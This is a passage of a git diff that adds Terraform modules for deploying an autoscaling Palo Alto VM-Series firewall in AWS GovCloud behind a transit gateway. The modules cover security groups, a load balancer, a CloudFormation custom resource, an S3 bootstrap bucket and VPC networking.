+    "aws_iam_role.LambdaExecutionRole",
+    "null_resource.dependency_getter",
+  ]
+}
+
+resource "aws_security_group" "PublicLoadBalancerSecurityGroup" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Public ELB security group"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-elb-sg"
+  }
+}
+
+resource "aws_lb" "PublicLoadBalancer" {
+  name               = "${var.tag}-vmseries-elb-${random_string.randomstring.result}"
+  internal           = false
+  load_balancer_type = "application"
+  subnets            = ["${var.fw_subnet1_id}"]
+  security_groups    = ["${aws_security_group.PublicLoadBalancerSecurityGroup.id}"]
+
+  tags = {
+    Environment = "${var.tag}-vmseries-elb"
+  }
+}
+
+resource "aws_lb_target_group" "PublicLoadBalancerTargetGroup" {
+  name = "${var.tag}-81-${random_string.randomstring.result}"
+
+  depends_on = [
+    "aws_lb.PublicLoadBalancer",
+  ]
+
+  health_check {
+    enabled             = true
+    interval            = 60
+    unhealthy_threshold = 10
+    protocol            = "HTTP"
+    port                = 81
+    path                = "/index.html"
+    matcher             = "200"
+  }
+
+  port     = 81
+  protocol = "HTTP"
+  vpc_id   = "${var.vpc_id}"
+}
+
+resource "aws_lb_listener" "PublicLoadBanlancerListener" {
+  load_balancer_arn = "${aws_lb.PublicLoadBalancer.arn}"
+  port              = "80"
+  protocol          = "HTTP"
+
+  default_action {
+    type             = "forward"
+    target_group_arn = "${aws_lb_target_group.PublicLoadBalancerTargetGroup.arn}"
+  }
+}
+
+resource "aws_security_group" "mgmt" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Security Group assigned to VM-Series management ENI"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["${var.fw_sg_source}"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-mgmt-sg"
+  }
+}
+
+resource "aws_security_group" "untrust" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Security Group assigned to VM-Series untrust ENI"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-untrust-sg"
+  }
+}
+
+resource "aws_security_group" "trust" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Security Group assigned to VM-Series trust ENI"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-trust-sg"
+  }
+}
+
+resource "aws_cloudformation_stack" "LambdaCustomResource" {
+  name       = "${var.tag}-LambdaCustomResource"
+  depends_on = ["aws_lambda_function.FwInit", "aws_lambda_function.InitLambda", "null_resource.dependency_getter"]
+
+  parameters {
+    InitLambdaArn                    = "${aws_lambda_function.InitLambda.arn}"
+    StackName                        = "${var.tag}"
+    Region                           = "${var.region}"
+    VPCID                            = "${var.vpc_id}"
+    MGMTSubnetAz1                    = "${join(",", var.fw_subnet0_id)}"
+    UNTRUSTSubnetAz1                 = "${join(",", var.fw_subnet1_id)}"
+    TRUSTSubnetAz1                   = "${join(",", var.fw_subnet2_id)}"
+    MgmtSecurityGroup                = "${aws_security_group.mgmt.id}"
+    UntrustSecurityGroup             = "${aws_security_group.untrust.id}"
+    TrustSecurityGroup               = "${aws_security_group.trust.id}"
+    VPCSecurityGroup                 = "${var.vpc_sg_id}"
+    KeyName                          = "${var.fw_key_name}"
+    ELBName                          = "${aws_lb.PublicLoadBalancer.id}"
+    ELBTargetGroupName               = "${aws_lb_target_group.PublicLoadBalancerTargetGroup.name}"
+    FWInstanceType                   = "${var.fw_vm_type}"
+    SSHLocation                      = "${var.fw_sg_source}"
+    MinInstancesASG                  = "${var.fw_min_instances}"
+    MaximumInstancesASG              = "${var.fw_max_instances}"
+    ScaleUpThreshold                 = "${var.fw_scale_threshold_up}"
+    ScaleDownThreshold               = "${var.fw_scale_threshold_down}"
+    ScalingParameter                 = "${var.fw_scale_parameter}"
+    ScalingPeriod                    = "${var.fw_scale_period}"
+    PanFwAmiId                       = "${var.fw_ami}"
+    LambdaENISNSTopic                = "${aws_sns_topic.LambdaENISNSTopic.id}"
+    FirewallBootstrapInstanceProfile = "${aws_iam_instance_profile.FirewallBootstrapInstanceProfile.id}"
+    LambdaExecutionRole              = "${aws_iam_role.LambdaExecutionRole.id}"
+    ASGNotifierRole                  = "${aws_iam_role.ASGNotifierRole.arn}"
+    ASGNotifierRolePolicy            = "${aws_iam_role_policy.ASGNotifierRolePolicy.id}"
+    BootstrapS3Bucket                = "${var.fw_bucket}"
+    LambdaS3Bucket                   = "${var.lambda_bucket}"
+    PanS3KeyTpl                      = "${var.KeyMap["Key"]}"
+    KeyPANWFirewall                  = "${var.api_key_firewall}"
+    KeyPANWPanorama                  = "${var.api_key_panorama}"
+    NATGWSubnetAz1                   = "${join(",", var.natgw_subnet_id)}"
+    LambdaSubnetAz1                  = "${join(",", var.lambda_subnet_id)}"
+    FwInit                           = "${aws_lambda_function.FwInit.id}"
+    InitLambda                       = "${aws_lambda_function.InitLambda.id}"
+    KeyDeLicense                     = "${var.api_key_delicense}"
+    LambdaENIQueue                   = "${aws_sqs_queue.LambdaENIQueue.id}"
+    Debug                            = "${var.enable_debug}"
+    NetworkLoadBalancerQueue         = "${aws_sqs_queue.NetworkLoadBalancerQueue.id}"
+  }
+
+  template_body = <<STACK
+{
+    "Parameters" : {
+        "InitLambdaArn": {
+            "Type": "String",
+            "Description": "ARN of the Init Lambda function"
+        },
+        "StackName": {
+            "Type": "String",
+            "Description": "Name of the Stack"
+        },
+        "Region": {
+            "Type": "String",
+            "Description": "The Region that the infrastructure is being deployed into"
+        },
+        "VPCID": {
+            "Type": "String",
+            "Description": "VPC ID"
+        },
+        "MGMTSubnetAz1" : {
+            "Type" : "CommaDelimitedList",
+            "Description": "Enter Subnet ID for the mgmt interface for AZ1"
+        },
+        "UNTRUSTSubnetAz1" : {
+            "Type" : "CommaDelimitedList",
+            "Description": "Enter Subnet ID for the untrust interface for AZ1"
+        },
+        "TRUSTSubnetAz1" : {
+            "Type" : "CommaDelimitedList",
+            "Description": "Enter Subnet ID for the trust interface for AZ1"
+        },      
+        "MgmtSecurityGroup": {
+            "Type": "String",
+            "Description": "Mgmt Security Group"
+        },
+        "UntrustSecurityGroup": {
+            "Type": "String",
+            "Description": "Untrust Security Group"
+        },
+        "TrustSecurityGroup": {
+            "Type": "String",
+            "Description": "Trust Security Group"
+        },
+        "VPCSecurityGroup": {
+            "Type": "String",
+            "Description": "VPC Security Group"
+        },
+        "KeyName": {
+            "Type": "String",
+            "Description": "Name of an existing Key in AWS"
+        },
+        "ELBName": {
+            "Type": "String",
+            "Description": "Name of the ELB"
+        },
+        "ELBTargetGroupName": {
+            "Type": "String",
+            "Description": "ELB Target Group Name"
+        },
+        "FWInstanceType": {
+            "Type": "String",
+            "Description": "FW Instance Type"
+        },
+        "SSHLocation": {
+            "Type": "String",
+            "Description": "The CIDR from where ssh sessions will originate"
+        },
+        "MinInstancesASG": {
+            "Type": "String",
+            "Description": "Minimum # of desired FW instances"
+        },
+        "MaximumInstancesASG": {
+            "Type": "String",
+            "Description": "Max # of instances in the ASG"
+        },
+        "ScaleUpThreshold": {
+            "Type": "String",
+            "Description": "The threshold which triggers a scale up event"
+        },
+        "ScaleDownThreshold": {
+            "Type": "String",
+            "Description": "The threshold which triggers a scale down event"
+        },
+        "ScalingParameter": {
+            "Type": "String",
+            "Description": "Parameter which determines the scaling"
+        },
+        "ScalingPeriod": {
+            "Type": "String",
+            "Description": "The duration of the scaling"
+        },
+        "PanFwAmiId": {
+            "Type": "String",
+            "Description": "AMI id of the PANW FW for the chosen region"
+        },
+        "LambdaENISNSTopic": {
+            "Type": "String",
+            "Description": "SNS topic that receives ASG notifications"
+        },
+        "FirewallBootstrapInstanceProfile": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "LambdaExecutionRole": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "ASGNotifierRole": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "ASGNotifierRolePolicy": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "BootstrapS3Bucket": {
+            "Type": "String",
+            "Description": "S3 bucket for firewall bootstrap"
+        },
+        "LambdaS3Bucket": {
+            "Type": "String",
+            "Description": "S3 bucket for firewall bootstrap"
+        },
+        "PanS3KeyTpl": {
+            "Type": "String",
+            "Description": "Version Associated with PANW Lambda"
+        },
+        "KeyPANWFirewall": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "KeyPANWPanorama": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "NATGWSubnetAz1": {
+            "Description": "Subnet IDs of AWS NAT Gateway in AZ1 ",
+            "Type" : "CommaDelimitedList"
+        },
+        "LambdaSubnetAz1": {
+            "Description": "Subnet IDs of Lambda Function interface in AZ1",
+            "Type" : "CommaDelimitedList"
+        },
+        "FwInit": {
+            "Type": "String",
+            "Description": "ARN of the Init FW function"
+        },
+        "InitLambda": {
+            "Type": "String",
+            "Description": "ARN of the Init Lambda function"
+        },
+        "KeyDeLicense": {
+            "Type": "String",
+            "Description": "The key to be used to delicense the Firewall"
+        },
+        "LambdaENIQueue": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "Debug": {
+            "Type": "String",
+            "Default": "No",
+            "AllowedValues": [
+                "Yes",
+                "No"
+            ]
+        },
+        "NetworkLoadBalancerQueue": {
+            "Type": "String",
+            "Description": "NLB Queue"
+        }
+    },
+    "Resources" : {
+    "LambdaCustomResource": {
+        "Type": "AWS::CloudFormation::CustomResource",
+        "Version" : "1.0",
+         "Properties" : {
+            "ServiceToken": {"Ref": "InitLambdaArn"},
+            "StackName": {"Ref": "StackName"},
+            "Region": {"Ref": "Region"},
+            "VpcId": {"Ref": "VPCID"},
+            "SubnetIDMgmt": { "Ref" : "MGMTSubnetAz1" },
+            "SubnetIDUntrust": { "Ref" : "UNTRUSTSubnetAz1" },
+            "SubnetIDTrust": { "Ref" : "TRUSTSubnetAz1" },
+            "MgmtSecurityGroup": {"Ref": "MgmtSecurityGroup"},
+            "UntrustSecurityGroup": {"Ref": "UntrustSecurityGroup"},
+            "TrustSecurityGroup": {"Ref": "TrustSecurityGroup"},
+            "VPCSecurityGroup": {"Ref": "VPCSecurityGroup"},
+	          "KeyName" : {"Ref": "KeyName"},
+	          "ELBName" : {"Ref": "ELBName"},
+	          "ELBTargetGroupName"  : { "Ref": "ELBTargetGroupName"},
+	          "FWInstanceType" : {"Ref": "FWInstanceType"},
+	          "SSHLocation" : {"Ref": "SSHLocation"},
+            "MinInstancesASG": {"Ref": "MinInstancesASG"},	          
+	          "MaximumInstancesASG" : {"Ref": "MaximumInstancesASG"},
+	          "ScaleUpThreshold" : {"Ref": "ScaleUpThreshold"},
+	          "ScaleDownThreshold" : {"Ref": "ScaleDownThreshold"},
+	          "ScalingParameter" : {"Ref": "ScalingParameter"},
+	          "ScalingPeriod" : {"Ref": "ScalingPeriod"},
+	          "ImageID" : { "Ref": "PanFwAmiId" },
+            "LambdaENISNSTopic": {"Ref": "LambdaENISNSTopic"},
+            "FirewallBootstrapRole": {"Ref": "FirewallBootstrapInstanceProfile"},
+            "LambdaExecutionRole": {"Ref": "LambdaExecutionRole"},
+            "ASGNotifierRole": {"Ref": "ASGNotifierRole"},
+            "ASGNotifierRolePolicy": {"Ref": "ASGNotifierRolePolicy"},
+	          "BootstrapS3Bucket" : { "Ref" : "BootstrapS3Bucket" },
+	          "LambdaS3Bucket" : { "Ref" : "LambdaS3Bucket" },
+	          "PanS3KeyTpl" : { "Ref" : "PanS3KeyTpl" },
+	          "KeyPANWFirewall" : { "Ref" : "KeyPANWFirewall" },
+	          "KeyPANWPanorama" : { "Ref" : "KeyPANWPanorama" },
+            "SubnetIDNATGW": { "Ref" : "NATGWSubnetAz1" },
+            "SubnetIDLambda": { "Ref" : "LambdaSubnetAz1" }, 
+            "FwInit": {"Ref": "FwInit"},
+            "InitLambda": {"Ref": "InitLambda"},
+            "KeyDeLicense": { "Ref": "KeyDeLicense" },
+            "LambdaENIQueue" : { "Ref": "LambdaENIQueue" },
+            "Debug": {"Ref": "Debug" },
+            "NetworkLoadBalancerQueue" : { "Ref": "NetworkLoadBalancerQueue" }
+       }
+    }
+  }
+}
+STACK
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/outputs.tf b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/outputs.tf
new file mode 100644
index 00000000..4025cb0e
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/outputs.tf
@@ -0,0 +1,7 @@
+output "sqs_id" {
+  value = "${aws_sqs_queue.NetworkLoadBalancerQueue.id}"
+}
+
+output "lb_dns_name" {
+  value = "${aws_lb.PublicLoadBalancer.dns_name}"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/variables.tf b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/variables.tf
new file mode 100644
index 00000000..35971d7a
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/fw_in_asg/variables.tf
@@ -0,0 +1,52 @@
+variable tag {}
+variable region {}
+variable vpc_id {}
+variable vpc_sg_id {}
+variable fw_key_name {}
+variable fw_vm_type {}
+variable fw_sg_source {}
+variable fw_min_instances {}
+variable fw_max_instances {}
+variable fw_scale_threshold_up {}
+variable fw_scale_threshold_down {}
+variable fw_scale_parameter {}
+variable fw_scale_period {}
+variable fw_ami {}
+variable fw_bucket {}
+variable lambda_bucket {}
+
+variable api_key_firewall {}
+variable api_key_panorama {}
+variable api_key_delicense {}
+variable enable_debug {}
+
+variable fw_subnet0_id {
+  type = "list"
+}
+
+variable fw_subnet1_id {
+  type = "list"
+}
+
+variable fw_subnet2_id {
+  type = "list"
+}
+
+variable natgw_subnet_id {
+  type = "list"
+}
+
+variable lambda_subnet_id {
+  type = "list"
+}
+
+variable KeyMap {
+  default = {
+    "Key" = "panw-aws.zip"
+  }
+}
+
+variable "dependencies" {
+  type    = "list"
+  default = []
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/main.tf b/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/main.tf
new file mode 100644
index 00000000..32fc086e
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/main.tf
@@ -0,0 +1,100 @@
+resource "random_string" "randomstring" {
+  length      = 30
+  min_numeric = 30
+  special     = false
+}
+
+resource "aws_s3_bucket" "bootstrap" {
+  bucket        = "${var.bucket_name_random ? join("", list(var.bucket_name, "-", random_string.randomstring.result)) : var.bucket_name}"
+  acl           = "private"
+  force_destroy = true
+}
+
+resource "aws_s3_bucket_object" "config_full" {
+  count  = "${length(var.config) > 0 ? length(var.config) : "0" }"
+  key    = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "content_full" {
+  count  = "${length(var.content) > 0 ? length(var.content) : "0" }"
+  key    = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "software_full" {
+  count  = "${length(var.software) > 0 ? length(var.software) : "0" }"
+  key    = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "license_full" {
+  count  = "${length(var.license) > 0 ? length(var.license) : "0" }"
+  key    = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "other" {
+  count  = "${length(var.other) > 0 ? length(var.other) : "0" }"
+  key    = "${element(var.other, count.index)}"
+  source = "${var.file_location}${element(var.other, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "config_empty" {
+  count   = "${length(var.config) == 0 ? 1 : 0 }"
+  key     = "config/"
+  content = "config/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+resource "aws_s3_bucket_object" "content_empty" {
+  count   = "${length(var.content) == 0 ? 1 : 0 }"
+  key     = "content/"
+  content = "content/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+resource "aws_s3_bucket_object" "license_empty" {
+  count   = "${length(var.license) == 0 ? 1 : 0 }"
+  key     = "license/"
+  content = "license/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+resource "aws_s3_bucket_object" "software_empty" {
+  count   = "${length(var.software) == 0 ? 1 : 0 }"
+  key     = "software/"
+  content = "software/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    "aws_s3_bucket.bootstrap",
+    "aws_s3_bucket_object.config_full",
+    "aws_s3_bucket_object.content_full",
+    "aws_s3_bucket_object.license_full",
+    "aws_s3_bucket_object.software_full",
+    "aws_s3_bucket_object.other",
+    "aws_s3_bucket_object.config_empty",
+    "aws_s3_bucket_object.content_empty",
+    "aws_s3_bucket_object.license_empty",
+    "aws_s3_bucket_object.software_empty",
+  ]
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/outputs.tf b/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/outputs.tf
new file mode 100644
index 00000000..d2ce4d7e
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/outputs.tf
@@ -0,0 +1,7 @@
+output "completion" {
+  value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+  value = "${aws_s3_bucket.bootstrap.id}"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/variables.tf b/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/variables.tf
new file mode 100644
index 00000000..c49e5f82
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/s3_bootstrap/variables.tf
@@ -0,0 +1,26 @@
+variable bucket_name {}
+variable bucket_name_random {}
+variable file_location {}
+
+variable config {
+  type    = "list"
+  default = []
+}
+
+variable content {
+  type    = "list"
+  default = []
+}
+
+variable license {
+  type    = "list"
+  default = []
+}
+
+variable software {
+  default = []
+}
+
+variable other {
+  default = []
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/main.tf b/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/main.tf
new file mode 100644
index 00000000..6d698090
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/main.tf
@@ -0,0 +1,296 @@
+#-----------------------------------------------------------------------------------------------
+# Create IGW & VPC
+resource "aws_internet_gateway" "main" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  tags = {
+    Name = "${var.tag}-igw"
+  }
+}
+
+resource "aws_vpc" "main" {
+  cidr_block = "${var.cidr_vpc}"
+
+  tags = {
+    Name = "${var.tag}-vpc"
+  }
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create mgmt subnets & mgmt route table
+resource "aws_eip" "natgw" {
+  count = "${length(var.cidr_natgw)}"
+  vpc   = true
+}
+
+
+resource "aws_nat_gateway" "natgw" {
+  count         = "${length(var.cidr_natgw)}"
+  allocation_id = "${element(aws_eip.natgw.*.id, count.index)}"
+  subnet_id     = "${element(aws_subnet.natgw.*.id, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-natgw"
+  }
+}
+
+resource "aws_route_table" "natgw" {
+  count  = "${length(var.cidr_natgw)}"
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block = "0.0.0.0/0"
+    gateway_id = "${aws_internet_gateway.main.id}"
+  }
+
+  tags = {
+    Name = "${var.tag}-natgw-rt"
+  }
+}
+
+resource "aws_subnet" "natgw" {
+  count             = "${length(var.cidr_natgw)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_natgw, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-natgw"
+  }
+}
+
+resource "aws_route_table_association" "natgw" {
+  count          = "${length(var.cidr_natgw)}"
+  subnet_id      = "${element(aws_subnet.natgw.*.id, count.index)}"
+  route_table_id = "${element(aws_route_table.natgw.*.id, count.index)}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create mgmt subnets & mgmt route table
+
+resource "aws_subnet" "mgmt" {
+  count             = "${length(var.cidr_mgmt)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_mgmt, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-mgmt"
+  }
+
+  depends_on = [
+    "aws_nat_gateway.natgw",
+    "aws_route_table.natgw",
+    "aws_subnet.natgw",
+    "aws_route_table_association.natgw",
+  ]
+}
+
+resource "aws_route_table" "mgmt_natgw" {
+  count  = "${length(var.cidr_mgmt)}"
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block     = "0.0.0.0/0"
+    nat_gateway_id = "${element(aws_nat_gateway.natgw.*.id, count.index)}"
+  }
+
+  tags = {
+    Name = "${var.tag}-mgmt-rt"
+  }
+
+  depends_on = [
+    "aws_nat_gateway.natgw",
+    "aws_route_table.natgw",
+    "aws_subnet.natgw",
+    "aws_route_table_association.natgw",
+    "aws_internet_gateway.main",
+    "aws_ec2_transit_gateway_vpc_attachment.main",
+  ]
+}
+
+resource "aws_route_table_association" "mgmt_natgw" {
+  count          = "${length(var.cidr_mgmt)}"
+  subnet_id      = "${element(aws_subnet.mgmt.*.id, count.index)}"
+  route_table_id = "${element(aws_route_table.mgmt_natgw.*.id, count.index)}"
+
+  depends_on = [
+    "aws_nat_gateway.natgw",
+    "aws_route_table.natgw",
+    "aws_subnet.natgw",
+    "aws_route_table_association.natgw",
+    "aws_internet_gateway.main",
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create untrust subnets & untrust route table
+resource "aws_subnet" "untrust" {
+  count             = "${length(var.cidr_untrust)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_untrust, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-untrust"
+  }
+
+  depends_on = [
+    "aws_ec2_transit_gateway_vpc_attachment.main",
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+resource "aws_route_table" "untrust" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block = "0.0.0.0/0"
+    gateway_id = "${aws_internet_gateway.main.id}"
+  }
+
+  tags = {
+    Name = "${var.tag}-untrust-rt"
+  }
+
+  depends_on = [
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+resource "aws_vpc_endpoint" "s3" {
+  vpc_id          = "${aws_vpc.main.id}"
+  service_name    = "com.amazonaws.${var.region}.s3"
+  route_table_ids = ["${aws_route_table.untrust.id}"]
+}
+
+resource "aws_route_table_association" "untrust" {
+  count          = "${length(var.cidr_untrust)}"
+  subnet_id      = "${element(aws_subnet.untrust.*.id, count.index)}"
+  route_table_id = "${aws_route_table.untrust.id}"
+
+  depends_on = [
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create trust subnets & trust route table
+resource "aws_subnet" "trust" {
+  count             = "${length(var.cidr_trust)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_trust, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-trust"
+  }
+
+  depends_on = [
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+resource "aws_route_table" "trust" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block         = "0.0.0.0/0"
+    transit_gateway_id = "${var.tgw_id}"
+  }
+
+  tags = {
+    Name = "${var.tag}-trust-rt"
+  }
+
+  depends_on = [
+    "aws_ec2_transit_gateway_vpc_attachment.main",
+  ]
+}
+
+resource "aws_route_table_association" "trust" {
+  count          = "${length(var.cidr_trust)}"
+  subnet_id      = "${element(aws_subnet.trust.*.id, count.index)}"
+  route_table_id = "${aws_route_table.trust.id}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create tgw attachment subnets & tgw  route table
+resource "aws_subnet" "tgw" {
+  count             = "${length(var.cidr_tgw)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_tgw, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-tgw"
+  }
+}
+
+resource "aws_route_table" "tgw" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  tags = {
+    Name = "${var.tag}-tgw-rt"
+  }
+}
+
+resource "aws_route_table_association" "tgw" {
+  count          = "${length(var.cidr_tgw)}"
+  subnet_id      = "${element(aws_subnet.tgw.*.id, count.index)}"
+  route_table_id = "${aws_route_table.tgw.id}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create lambda subnets & route table
+resource "aws_subnet" "lambda" {
+  count             = "${length(var.cidr_lambda)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_lambda, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-lambda"
+  }
+}
+
+resource "aws_route_table" "lambda" {
+  count  = "${length(var.cidr_lambda)}"
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block     = "0.0.0.0/0"
+    nat_gateway_id = "${element(aws_nat_gateway.natgw.*.id, count.index)}"
+  }
+
+  tags = {
+    Name = "${var.tag}-lambda-rt"
+  }
+}
+
+resource "aws_route_table_association" "lambda" {
+  count          = "${length(var.cidr_lambda)}"
+  subnet_id      = "${element(aws_subnet.lambda.*.id, count.index)}"
+  route_table_id = "${element(aws_route_table.lambda.*.id, count.index)}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Associate with TGW
+resource "aws_ec2_transit_gateway_vpc_attachment" "main" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  subnet_ids = ["${aws_subnet.tgw.*.id}"]
+
+  transit_gateway_id                              = "${var.tgw_id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags = {
+    Name = "${var.tag}-attachment"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "main" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.main.id}"
+  transit_gateway_route_table_id = "${var.tgw_rtb_id}"
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/outputs.tf b/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/outputs.tf
new file mode 100644
index 00000000..d0b2229d
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/outputs.tf
@@ -0,0 +1,39 @@
+output "mgmt_id" {
+  value = "${aws_subnet.mgmt.*.id}"
+}
+
+output "untrust_id" {
+  value = "${aws_subnet.untrust.*.id}"
+}
+
+output "trust_id" {
+  value = "${aws_subnet.trust.*.id}"
+}
+
+output "tgw_id" {
+  value = "${aws_subnet.tgw.*.id}"
+}
+
+output "lambda_id" {
+  value = "${aws_subnet.lambda.*.id}"
+}
+
+output "natgw_id" {
+  value = "${aws_subnet.natgw.*.id}"
+}
+
+output "vpc_id" {
+  value = "${aws_vpc.main.id}"
+}
+
+output "tgw_vpc_attachment_id" {
+  value = "${aws_ec2_transit_gateway_vpc_attachment.main.id}"
+}
+
+output "default_security_group_id" {
+  value = "${aws_vpc.main.default_security_group_id}"
+}
+
+output "untrust_route_table_id" {
+  value = "${aws_route_table.untrust.id}"
+}
diff --git a/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/variables.tf b/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/variables.tf
new file mode 100644
index 00000000..d043a5b5
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/modules/vpc_in/variables.tf
@@ -0,0 +1,36 @@
+variable tgw_id {}
+variable tgw_rtb_id {}
+variable region {}
+variable cidr_vpc {}
+
+variable azs {
+  type = "list"
+}
+
+variable cidr_mgmt {
+  type = "list"
+}
+
+variable cidr_untrust {
+  type = "list"
+}
+
+variable cidr_trust {
+  type = "list"
+}
+
+variable cidr_lambda {
+  type = "list"
+}
+
+variable cidr_tgw {
+  type = "list"
+}
+
+variable cidr_natgw {
+  type = "list"
+}
+
+variable tag {
